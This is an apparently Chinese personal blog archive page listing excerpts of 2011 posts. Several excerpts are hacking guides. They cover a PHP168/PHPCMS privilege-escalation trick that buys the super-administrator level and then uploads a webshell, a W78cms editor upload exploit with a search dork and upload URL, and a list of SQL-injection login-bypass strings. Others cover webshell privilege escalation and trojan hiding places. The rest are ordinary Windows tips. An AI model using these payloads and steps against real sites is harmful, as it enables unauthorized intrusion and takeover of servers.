文章存档

PHP168 V6.01/6.02权限提升及暴本地路径漏洞

2011-01-22 11:52
  PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用 PHPCMS V6.01存在严重的安全问题 注册一个帐户,进入会员中心。 你会看到如下字样。 你现在的级别是普通会员,你将要购买的级别是超级管理员,需要积分0 点击购买,如返回你现在级别是超级管理员等字样。返回会员中心查看一下 然后找到后台登录传shell即可   php爆页面绝对路径 1、加引号'这个最常用 2、变参数类型,比如把id=1改为id=a等...

W78cms网站管理系统0day

2011-01-22 11:51
  漏洞很简单,出现在editor上面,大虾应该都知道: 关键词为:inurl:ShopMore.asp?id 访问这个地址 https://xxxxxx.com/nbwebshell/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Hack.asp 访问这个地址可以建立个Hack.ASP的文件夹…… 再用这个html代码上传。 <form...

网站的万能密码

2011-01-22 11:50
  所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。 对一些我们扫描出后台的网站,我们可以试一下万能密码,或许可能就进去了。当然对于没有此漏洞的网站是无效的。 asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11: 1 or '1'='1'=1 12: 1 or '1'='1' or...

WebShell提权方法大全

2011-01-22 11:49
  得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用。 WEBSHELL权限提升技巧  c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All...

木马隐藏地点全搜查

2011-01-22 11:41
  木马是一种基于远程控制的病毒程序,该程序具有很强的隐蔽性和危害性,它可以在人不知鬼不觉的状态下控制你或者监视你。有人说,既然木马这么厉害,那我离它远一点不就可以了!然而这个木马实在是“淘气”,它可不管你是否欢迎,只要它高兴,它就会想法设法地闯到你“家”中来的!哎呀,那还了得,赶快看看自己的电脑中有没有木马,说不定正在“家”中兴风作浪呢!那我怎么知道木马在哪里呢,相信不熟悉木马的菜鸟们肯定想知道这样的问题。下面就是木马潜伏的诡招,看了以后不要忘记采取绝招来对付这些损招哟!    ...

电脑各种错误信息的中文意思

2011-01-22 11:40
  一、BIOS中的提示信息 提示信息 说明 Drive A error 驱动器A错误 System halt 系统挂起 Keyboard controller error 键盘控制器错误 Keyboard error or no keyboard present 键盘错误或者键盘不存在 BIOS ROM checksum error BIOS ROM 校验错误 Single hardisk cable fail 当硬盘使用Cable选项时硬盘安装位置不正确 FDD Controller Failure BIOS 软盘控制器错误 HDD Controller...

释放C盘空间的27招

2011-01-22 11:39
  主要讲讲Windows操作系统在C盘空间不足的情况下,我们可以通过那些具体手段来增加C盘空间。         1.打开“我的电脑”-“工具”-“文件夹选项”-“查看”-在“显示所有文件和文件夹”选项前打勾-“确定”       用户名一般是:Administrator          2.删除以下文件夹中的内容:        ...

建立个O盘,隐藏你的A片

2011-01-22 11:39
  不用加密软件,隐藏你放在电脑的秘密。     方法很简单,新建个文本文档复制以下代码:     复制内容到剪贴板     代码:     @ECHO OFF     MD E:\RECYCLED\UDrives.{25336920-03F9-11CF-8FD0-00AA00686F13}>NUL     IF EXIST O:\NUL GOTO...

一些Windows下的快捷键

2011-01-22 11:37
   F1 显示当前程序或者windows的帮助内容。   F2 当你选中一个文件的话,这意味着“重命名”   F3 当你在桌面上的时候是打开“查找:所有文件” 对话框   F10或ALT 激活当前程序的菜单栏   windows键或CTRL+ESC 打开开始菜单   CTRL+ALT+DELETE 在win9x中打开关闭程序对话框   CTRL+SHIFT+ESC 打开任务管理器   在win9x中是打开开始菜单   DELETE 删除被选择的选择项目,如果是文件,将被放入回收站   SHIFT+DELETE...

电脑开机警报声的含义

2011-01-22 11:35
@echo off title: 联系QQ:1067373689 黑客官网:https://xiaoxiaogongzuoshi.webnode.cn/: main set wz= echo                     网速测试Ping...     ...
条目: 21 - 30 共 40
<< 1 | 2 | 3 | 4 >>
小菲